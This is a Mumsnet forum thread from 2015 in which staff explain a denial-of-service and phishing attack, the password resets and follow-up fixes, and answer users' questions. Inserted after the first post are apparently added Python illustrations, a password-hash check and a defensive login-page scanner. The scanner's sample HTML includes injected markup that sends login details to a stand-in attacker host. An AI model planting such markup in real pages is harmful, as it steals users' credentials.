
More about the Technical side of the attacks on Mumsnet

720 replies

JustineMumsnet · 19/08/2015 11:17

Hi all,
There have been, understandably, a lot of questions about the tech side of the attack on Mumsnet, so here - courtesy of the tech team - is some more detail. We obviously do have to be a bit careful with the details because we don't want to give away information that could help other hackers. Whilst it's true that "security through obscurity" isn't real security, we have no wish to make it easier for a future attacker.

We've spent a lot of time since the attacks began, proactively defending against them, minimising the impact of it and protecting against future attacks. With a busy site like Mumsnet there is a lot of information to go through. When we uncover a new snippet of information, perhaps a new suspicious user account, we have to go back to the start and reanalyze, so it can be slow going at times. We are working with our technology partners who have a lot of experience of these kinds of attacks and we have used lots of resources available to us.

Some aspects of our technology stack have already been extensively tested by external specialists. Some of our software code is quite old - nearly as old as Mumsnet itself - and things have moved on a lot over that time. However, we have a program of code review whereby all new code is checked by someone other than the person who created it. It's not perfect and everyone makes mistakes, but we take the quality of our code very seriously.

The Denial Of Service (DOS) attack against Mumsnet was a heavy, sustained attack which initially overwhelmed our ability to respond to legitimate requests. Mumsnet might typically get something like 50-100 requests per second. During the attack we were getting around 17,000 requests per second. Each request carried more data than is normal as well.

The hacking attack on our website was separate from the DOS, though we believe perpetrated by the same person or people. We follow many of the industry's best practices, such as using HTTPS for our login pages, keeping our database separate from our cluster of web servers and not accessible from the internet, and so on. We don't necessarily use the same standards of security as say your online banking service might use, for example requiring multiple passwords or using two factor authentication. We try to balance security against usability and the sensitivity of the information we hold. After all, as pointed out by one of you in an earlier thread, the majority of information we have about a user is what that user publishes in Talk, which is there for all to see.

As has been mentioned several times, we keep our passwords encrypted and we use the recommended algorithms for this, with high "strength" settings. This means that if someone somehow obtained the password data from our database they wouldn't be able to make any use of them - they wouldn't work on our site or on any other site even if the user used the same password on that other site. This remains the case even for MNHQ staff; they cannot un-encrypt the passwords either.

We are now pretty confident it was a phishing attack. Phishing, where a hacker gets a user to enter their username and password into a form from which they can capture that information, fits all the data we have. The hacker doesn't need to decrypt anything, because they capture the password in the browser as it is entered (either by typing it, or if it was automatically remembered by the user's browser or password manager). The list of passwords that has been published includes some that users have identified as being ones that they've mistyped. Our database wouldn't have mistyped ones, only accurate ones, whereas those collected by recording what a user submits would and does contain errors.

It's not obvious how it has been conducted though. We have been able to create a proof of concept which shows that it could work, but that relies on some steps that would be difficult or virtually impossible for a hacker. Phishing attacks sometimes use social engineering to "trick" people into using the fake website rather than the real one, but again, for various reasons, we can rule some of these out. Other phishing attacks are more technical and use other means to get people to visit the fake page. One such example is Cross Site Scripting (XSS). XSS is ranked number three on the Open Web Application Security Project top ten list of web site security problems. If the hacker can get the website to put his own code on pages which are to be viewed by other users, s/he can modify the page to redirect the login process to their own site, to a page which looks just like our login page but is actually recording the details and sending them to the hacker. Also possible, but even less likely, is modifying our login page to submit the details to the hacker as well as to us. If the hacker had gained access to our Content Management System he could have done the former, though not the latter. However, we record all changes that are made and there are no suspicious ones.

It's impossible for us to know how many users' passwords have been collected. It's a reasonable assumption, and our working one, that the passwords of everybody that has logged in since 6th August 2015, and possibly some time before that, have been collected.

In light of the attacks, we've bolstered some aspects of our security, particularly around our administrative functions. We have further changes planned and will be working on these in the coming days.

Forcing everyone to reset their password, as we have done, would render the list useless provided that users don't choose the same new password and they've not used the same username and password elsewhere.

Some users have questioned why certain other changes aren't being made already, such as a move to enforcing stricter passwords, which makes sense. However, given how crucial the part of our system that deals with passwords is, we have to be really cautious when making changes to it. We don't want to rush and end up creating bigger holes, but we will certainly take steps to encourage users to strengthen passwords as soon as practicable.

Any questions do post here - we'll answer as transparently as we can - bearing in mind the caveat about helping future hackers mentioned earlier.

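The mistyped-password argument in the post above, worked through as an added example that is not Mumsnet's code: a store of salted PBKDF2 hashes stands in for the site's "recommended algorithm with high strength settings", and a constructed "published list" is split into entries the database could have produced and entries that only capture at the login form explains.

```python
import hashlib
import hmac
import os

# Added illustration, not Mumsnet's code: PBKDF2-HMAC-SHA256 with a high iteration count
# stands in for whichever "recommended algorithm with high strength settings" the site uses.
ITERATIONS = 100_000

def hash_password(password: str, salt: bytes) -> bytes:
    """One-way, salted and deliberately slow; nobody holding the output can recover the password."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)

def build_store(credentials):
    """Server-side store {user: (salt, hash)}; plaintext is seen only when the password is set."""
    store = {}
    for user, password in credentials:
        salt = os.urandom(16)
        store[user] = (salt, hash_password(password, salt))
    return store

def verify(store, user, candidate: str) -> bool:
    """Constant-time comparison of a candidate against the stored hash."""
    if user not in store:
        return False
    salt, stored = store[user]
    return hmac.compare_digest(hash_password(candidate, salt), stored)

def classify_leak(store, leaked):
    """Entries that verify could have come from anywhere; entries that do not are mistyped
    submissions, which a database dump cannot contain but capture at the login form would."""
    verified, rejected = [], []
    for user, password in leaked:
        (verified if verify(store, user, password) else rejected).append((user, password))
    return verified, rejected

# Constructed sample: two registered users and a "published list" mixing their real
# passwords with the typos a keystroke-capturing fake login form would also record.
SAMPLE_STORE = build_store([("alice", "correct horse battery"), ("bob", "staple-2015")])
SAMPLE_LEAK = [
    ("alice", "correct horse battery"),   # real
    ("alice", "corect horse battery"),    # typo: cannot exist in the database
    ("bob", "staple-2015"),               # real
    ("bob", "staple-2105"),               # typo
    ("carol", "not-a-member"),            # user unknown to the site altogether
]

def leak_summary():
    """Counts an incident responder would look at first."""
    verified, rejected = classify_leak(SAMPLE_STORE, SAMPLE_LEAK)
    return {"verified": len(verified), "rejected": len(rejected)}
```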
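The injected-page scenario in the post above (a look-alike form posting elsewhere, or foreign script added to the login page), as an added defender-side check that is not Mumsnet's code: a small scanner over served HTML that flags forms submitting off-site and scripts loaded from unlisted origins. The hostnames forum.example, static.example and phish.invalid are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Added illustration, not Mumsnet's code. Hostnames are constructed placeholders.
SITE_HOST = "forum.example"
SCRIPT_ALLOWLIST = {SITE_HOST, "static.example"}

class LoginPageAuditor(HTMLParser):
    """Record forms that submit off-site and scripts loaded from origins not on the allowlist,
    the two ways the post describes an injected page diverting or copying login details."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # Relative actions ("/login") parse with no hostname and count as same-origin.
            host = urlparse(a.get("action") or "").hostname
            if host and host != SITE_HOST:
                self.findings.append(("form-action-offsite", host))
        elif tag == "script" and a.get("src"):
            host = urlparse(a["src"]).hostname
            if host and host not in SCRIPT_ALLOWLIST:
                self.findings.append(("script-unlisted-origin", host))

def audit(page: str):
    """Return the list of (finding, host) pairs for one rendered page."""
    p = LoginPageAuditor()
    p.feed(page)
    p.close()
    return p.findings

# Constructed sample: the genuine login form and script, followed by the kind of injected
# markup the post warns about (a look-alike form posting elsewhere, a foreign script).
SAMPLE_HTML = """<html><body>
<form action="/login" method="post"><input name="user"><input name="pass" type="password"></form>
<script src="https://static.example/app.js"></script>
<form action="https://phish.invalid/collect" method="post">
  <input name="user"><input name="pass" type="password"></form>
<script src="//phish.invalid/hook.js"></script>
</body></html>"""
```

In browsers, the form-action directive of Content-Security-Policy blocks a redirected submission outright; the scanner catches the injected markup before it reaches a user.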
SacredHeart · 19/08/2015 22:12

It took three years and multiple government agencies internationally to find and convict the hackers who DDOSd PayPal over Wikileaks.

The resource needed to track this person if they are as good as they claim just isn't worth it.

BertieBotts · 19/08/2015 22:13

It takes time and effort to find out home addresses. They don't have home addresses of everyone registered. They wouldn't have been able to physically find them in the time which has elapsed. And it's not valuable enough to them to do it. One or two is a scare tactic, more would be risky for them in terms of getting caught.

BertieBotts · 19/08/2015 22:14

MI5 exists to thwart terrorism, they don't care about "swatting", it's a police matter.

BertieBotts · 19/08/2015 22:15

Grin Love the escalation of the usual MN "call 101!!" though!

PolkadotsAndMoonbeams · 19/08/2015 22:20

Can I ask tech a question please?

Sometimes pages aren't loading properly, and I'm getting a page in just text - I'm guessing this is because it's so busy tonight.

However when I see the plain text page, it shows my e-mail address. Should this be the case? I can't see it when the page loads properly.

It's happened a couple of times, and I took a screen shot last time. Would you like to see this? I don't want to post it on the thread because it shows my e-mail.

Maryz · 19/08/2015 22:24

Message withdrawn at poster's request.

BertieBotts · 19/08/2015 22:38

Polka I think that will only show because you are logged in. I'm not certain - around 95% sure.

If you mouse over the bit next to the PM notification it says "Hi " or it does for me.

akkakk · 19/08/2015 23:20

polka that is simply that the website is not loading the CSS file.
The CSS file is the file which formats / lays out the content on the screen / sets colours / sets fonts etc...
It also defines some areas as invisible so that when you click a button the javascript (which runs in your browser) can say 'make it visible' and hey presto you have something that pops down etc.
So if your email address is shown when you hover over the 'My Mumsnet' bit or the envelope top right - then that is why it is suddenly visible with no CSS rules to say make it invisible...

Garrick · 20/08/2015 00:03

So has anybody joined the IRC chat yet?

MaudGonneMad · 20/08/2015 00:21

MI5 Grin

ChristineDePisan · 20/08/2015 03:49

Oh FFS I was logged out just now. Is that now a thing? If we are inactive on the site for a particular period we get automatically booted out?

saintlyjimjams · 20/08/2015 07:04

No, they've done another mass forced password change christine - needs ten characters including a number (although the mobile site doesn't tell you that)

TheHoneyBadger · 20/08/2015 09:48

they first started hacking on july 14th - they've had plenty of time tbf.

JustineMumsnet · 20/08/2015 10:16

Morning all,

Here's an update of where we are at. The tech team found the hole which was accessed to capture user login data via phishing and patched it yesterday pm. Then, as you probably know, we forced another password update requiring higher-security passwords last night (once we'd rebutted a further DDoS attack).

We are undergoing full security testing by external experts over the next few days to determine if there are any other weaknesses which might be exploited. We'll update you when that process is completed.

Many thanks for your patience and understanding. The best advice remains to update your password here and any passwords used on other sites that are the same as ones you've used on Mumsnet before yesterday.

We're really sorry for the extra bother and anxiety caused.

SnakeyMcBadass · 20/08/2015 10:24

I haven't been forced to log out. I'm still here under the username I've had published and the password I changed yesterday. Any ideas?

MotherOfFlagons · 20/08/2015 10:25

I haven't been forced to log out either.

wannaBe · 20/08/2015 10:30

justine is there any way of getting to reports of dubious posters quickly? There is currently a fairly dubious one on the 3rd hacker thread who has essentially already been called as a troll/jeffrey, although she has put her ahem unique typing down to the fact she is dialectic and has leaning difficulties... IMO posters are on to her, but the fact she is essentially claiming that no-one is safe from hacking of all their accounts isn't helping the current of unease atm.

BrendaandEddie · 20/08/2015 10:34

and here Jeffrey meets Justine.

THROUGH THE HOLE

JustineMumsnet · 20/08/2015 10:56

@wannaBe

justine is there any way of getting to reports of dubious posters quickly? There is currently a fairly dubious one on the 3rd hacker thread who has essentially already been called as a troll/jeffrey, although she has put her ahem unique typing down to the fact she is dialectic and has leaning difficulties... IMO posters are on to her, but the fact she is essentially claiming that no-one is safe from hacking of all their accounts isn't helping the current of unease atm.

thanks - will ask community team to look urgently

tribpot · 20/08/2015 10:58

I'm surprised to hear you're starting security testing now, I assume actually this has been ongoing for some time.

I asked the following earlier

Are the general login problems that have dogged the site for weeks completely separate from this attack? How could you be sure?

Jeffrey was able to modify posts, was this by phishing MNHQ account details?
In this case I think we have established that RebeccaMumsnet was targeted specifically to capture her password via a dodgy link?

Have you reported yourselves to the ICO?

Why is there a need for support for such a wide range of browsers?

JustineMumsnet · 20/08/2015 11:00

@SnakeyMcBadass

I haven't been forced to log out. I'm still here under the username I've had published and the password I changed yesterday. Any ideas?

From what we can see this is a bug affecting about 10% of users. If you haven't been forced to log out please do so yourself and update your password.

JustineMumsnet · 20/08/2015 11:02

@tribpot

I'm surprised to hear you're starting security testing now, I assume actually this has been ongoing for some time.

I asked the following earlier

Are the general login problems that have dogged the site for weeks completely separate from this attack? How could you be sure?

Jeffrey was able to modify posts, was this by phishing MNHQ account details?
In this case I think we have established that RebeccaMumsnet was targeted specifically to capture her password via a dodgy link?

Have you reported yourselves to the ICO?

Why is there a need for support for such a wide range of browsers?

Internal testing has been going on since we've known someone accessed the database - literally night and day - we've been reviewing code across the site. What we are doing now is stress testing via an external firm.

tigerscameatnight · 20/08/2015 11:05

Justine are you able to confirm if they have accessed addresses given through product testing or insight panel or local ed info (I am an old local Ed)

CatsCocktailsAndBooks · 20/08/2015 11:16

Thanks for the updates Justine. Smile

JustineMumsnet · 20/08/2015 11:17

@tigerscameatnight

Justine are you able to confirm if they have accessed addresses given through product testing or insight panel or local ed info (I am an old local Ed)

Insight data (including product testing) is kept in a different system and protected with a username/password combination which is changed regularly and set by our tech team. We have no reason to think this system was compromised.

Local data is only accessible by individual LEs or admin. Admin access was shut down last week - we don't know for sure what was accessed prior to that but we have no evidence to suggest it was.
